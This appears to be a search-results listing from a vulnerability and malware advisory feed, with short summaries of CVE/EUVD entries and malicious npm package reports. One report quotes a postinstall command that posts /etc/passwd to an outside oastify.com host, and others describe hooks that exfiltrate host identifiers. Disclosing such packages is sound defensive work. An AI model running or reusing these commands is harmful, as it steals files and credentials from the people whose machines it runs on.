241401 matches found
EUVD-2026-35533
Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally...
EUVD-2026-35643
Heap-based buffer overflow in Microsoft Windows DNS allows an authorized attacker to elevate privileges locally...
EUVD-2026-35655
Windows Universal Disk Format File System Driver UDFS Elevation of Privilege Vulnerability...
EUVD-2026-35656
Windows Universal Disk Format File System Driver UDFS Elevation of Privilege Vulnerability...
EUVD-2026-35461
Insufficient configuration management in the listed devices allows authenticated administrators connected to the local network to tamper with the system...
EUVD-2026-35705
Omnissa Workspace ONE® Assist for macOS contains a Local Privilege Escalation Vulnerability...
EUVD-2026-35440
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution...
CVE-2026-28237
Unrestricted resource allocation in AMD uProf may be exploitable to consume excessive system resources, potentially leading to a loss of availability...
EUVD-2026-35789
Dell Client Platform BIOS contains a Weak Encoding for Password vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Elevation of Privileges...
Malicious code in fhirproxy-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 405cf847121f4bfed32bc5679a40b64c1338b142af75823ef9583944a7ae7b5a On npm install via the prepare lifecycle hook and many other lifecycle aliases and on require, index.js performs broad reconnaissance and exfiltratio...
MAL-2026-5461 Malicious code in fhirproxy-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 405cf847121f4bfed32bc5679a40b64c1338b142af75823ef9583944a7ae7b5a On npm install via the prepare lifecycle hook and many other lifecycle aliases and on require, index.js performs broad reconnaissance and exfiltratio...
test-poc
CVE-2021-0928, writeToParcel/createFromParcel serialization...
Malicious code in exodus-solana-sdk (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ecffe98bff5e1c4655631cf8f92b1b1ccb534e0eeaa7043fab0d5fa1fbfabc35 Package name impersonates the Exodus cryptocurrency wallet brand exodus-solana-sdk. package.json declares a postinstall hook node src/canary.js that...
MAL-2026-5422 Malicious code in @nstrlabs/shared-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector efc72373a5a06d31becb2dd02ced949866c9da14ae6d0bfdb3b4f4c882e40445 On npm install, the package's preinstall script runs index.js, which collects host identifiers os.hostname, os.userInfo.username, dirname, process.cw...
Malicious code in @klapp-about/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 715f07e0a1984fc9eb7d6432fc2491b08139755426b3c8905ba2d9274e2d4875 On npm install, the package's preinstall hook node index.js collects host and user identity data — os.hostname, os.userInfo.username, dirname,...
Malicious code in @klapp-login-platform/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ffe05a6af27bd4b583c0284a40129eb63f4dcb4a6197e74195a8bb85bf71d1e7 On npm install, the package's preinstall lifecycle hook executes index.js, which collects the installer's hostname, username, package install path...
Malicious code in morningstar-design-system (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e On npm install, the package's preinstall lifecycle script runs wget against a hardcoded bare-IP HTTP endpoint, passing the output of id, pwd, hostnam...
CVE-2026-28237
Unrestricted resource allocation in AMD uProf may be exploitable to consume excessive system resources, potentially leading to a loss of availability...
Exploit for CVE-2026-46394
CVE-2026-46394 - HAXcms Git.php OS Command Injection CWE-78...
Malicious code in @shell-cabinet/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...